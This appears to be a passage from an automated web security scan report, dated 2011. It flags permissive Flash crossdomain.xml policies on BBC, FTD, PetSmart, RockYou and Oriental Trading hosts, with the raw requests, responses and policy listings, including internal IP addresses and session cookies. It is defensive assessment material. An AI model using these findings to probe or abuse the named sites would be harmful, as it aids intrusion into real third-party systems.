<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.65. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 16 May 2011 10:43:05 GMT
Date: Mon, 16 May 2011 10:41:05 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.66. https://ordering.ftd.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ordering.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:00 GMT
Server: Apache
Set-Cookie: TLTSID=9AA032847F61107F002288ADA5203D48; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9AA032847F61107F002288ADA5203D48; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 02:10:00 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

6.67. http://pet.imageg.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pet.imageg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pet.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:49:57 GMT
Date: Mon, 16 May 2011 10:49:57 GMT
Content-Length: 781
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.68. http://rya.rockyou.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rya.rockyou.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rya.rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
Last-Modified: Wed, 06 Apr 2011 23:33:16 GMT
ETag: "4ff-4a0486ac18700"
Accept-Ranges: bytes
Content-Length: 1279
Vary: Accept-Encoding,User-Agent
X-RyHeader: www114.rockyou.com took D=104 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.rockmyspace.com" to-ports="*" />
<allow-access-from domain="*.rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockmyspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.meebo.com" to-ports="*" />
<allow-access-from domain="*.rockyou-internal.com" to-ports="*" />
<allow-access-from domain="*.ministryofwar.com" to-ports="*"/>
<allow-access-from domain="api.msappspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="x.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochimedia.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn1.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn2.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn4.com" to-ports="*" />
...[SNIP]...

6.69. http://s7.orientaltrading.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s7.orientaltrading.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s7.orientaltrading.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Expires: Mon, 16 May 2011 11:58:49 GMT
Date: Mon, 16 May 2011 01:58:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
